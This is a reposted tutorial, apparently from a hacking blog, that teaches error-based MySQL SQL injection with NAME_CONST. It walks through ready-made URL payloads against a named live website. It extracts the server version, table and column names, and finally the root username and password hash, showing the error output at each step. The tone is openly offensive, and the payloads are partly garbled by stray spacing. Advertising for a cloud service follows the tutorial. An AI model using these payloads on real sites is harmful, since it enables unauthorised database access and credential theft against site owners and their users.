It's been a while since I 've made an SQL Injection tutorial, so I 'd thought I shoshould make a new tutorial using the method name_const. there's not enough papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Related information
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code: NAME_CONST (DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST () causes the column to have the given name. The arguments shocould be constants.
SELECT NAME_CONST ('test', 1)
| --------------- |
| TEST |
|
| --------------- |
| 1 |
|
| --------------- |
Http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you 've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
Code: http://www.bkjia.com/qcwh/content/detail. php? Id = 330 & sid = 19 & cid = 261'
Code: and + 1 = (select + * + from + (select + NAME_CONST (VAR, 1), NAME_CONST (VAR, 1) + as + x )--
VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables
Let's try it out on my site ..
Code: http://www.bkjia.com/qcwh/content/detail. php? Id = 330 & sid = 19 & cid = 261 + and + 1 = (select + * + from + (select + NAME_CONST (version (), 1 ), NAME_CONST (version (), 1) + as + x )--
Error: Duplicate column name '5. 0.27-community-nt'
Now I 've tried a couple of sites, and I was getting invalid callto NAME_CONST trying to extract data. nothing was wrong with my syntax, just wouldn't work there. luckily, they work here so let's get this going again...
Data Extraction
Code: + and + 1 = (select + * + from + (select + NAME_CONST (select + DATA + limit + 0, 1), 1 ), NAME_CONST (select + DATA + limit + 0, 1) + as + x )--
We shoshould get a duplicate column 1 error...
Code: http://www.bkjia.com/qcwh/content/detail. php? Id = 330 & sid = 19 & cid = 261 + and + 1 = (select + * + from + (select + NAME_CONST (select + 1 + limit + ), 1), NAME_CONST (select + 1 + limit + 0, 1) + as + x )--
Error: Duplicate column name '1
Now let's get the tables out this bitch ..
Code: + and + 1 = (select + * + from + (select + NAME_CONST (select + table_name + from + information_schema.tables + where + table_schema = database () + limit + 0, 1), NAME_CONST (select + table_name + from + information_schema.tables + where + table_schema = database () + limit + 0, 1 )) + as + x )--
Let's see if it works here, if it does, we can go on and finish the job.
Code: http://www.bkjia.com/qcwh/content/detail. php? Id = 330 & sid = 19 & cid = 261 + and + 1 = (select + * + from + (select + NAME_CONST (select + table_name + from + information_schema.tables + where + table_schema = database () + limit + 0, 1), NAME_CONST (select + table_name + from + information_schema.tables + where + table_schema = database () + limit + 0, 1 )) + as + x )--
Error: Duplicate column name 'com _ admanage
Now I'm going to be lazy and use mysql. user as an example, just for the sake of time.
Let's get the columns out of the user table ..
Code: + and + 1 = (select + * + from + (select + NAME_CONST (select + column_name + from + information_schema.columns + where + table_name = 0xHEX_OF_TABLENAME + limit + 0, 1 ), 1), NAME_CONST (select + column_name + from + information_schema.columns + where + table_name = 0xHEX_OF_TABLENAME + limit + 0, 1) + as + x )--
So mine looks like this, and I get the duplicate column name 'host '.
Code: http://www.bkjia.com/qcwh/content/detail. php? Id = 330 & sid = 19 & cid = 261 + and + 1 = (select + * + from + (select + NAME_CONST (select + column_name + from + information_schema.columns + where + table_schema = 0x6d7973716c + and + table_name = 0x75736572 + limit + ), 1), NAME_CONST (select + column_name + from + information_schema.columns + where + table_schema = 0x6d7973716c + and + table_name = 0x75736572 + limit +), 1 )) + as + x )--
Error: Duplicate column name 'host'
Woot, time to finish this bitch off.
Code: + and + 1 = (select + * + from + (select + NAME_CONST (select + concat_ws (0x207e20, COLUMN1, COLUMN2) + from + TABLENAME + limit + 0, 1 ), 1), NAME_CONST (select + concat_ws (0x207e20, COLUMN1, COLUMN2) + from + TABLENAME + limit + 0, 1) + as + x )--
So mine looks like this...
Code: http://www.bkjia.com/qcwh/content/detail. php? Id = 330 & sid = 19 & cid = 261 + and + 1 = (select + * + from + (select + NAME_CONST (select + concat_ws (0x207e20, User, Password) + from + mysql. user + limit + 0, 1), NAME_CONST (select + concat_ws (0x207e20, User, Password) + from + mysql. user + limit + 0, 1) + as + x )--
Error: Duplicate column name 'root ~ * B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
From http://hi.baidu.com/evilrapper/blog/item/323702a10ff4009446106459.html
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
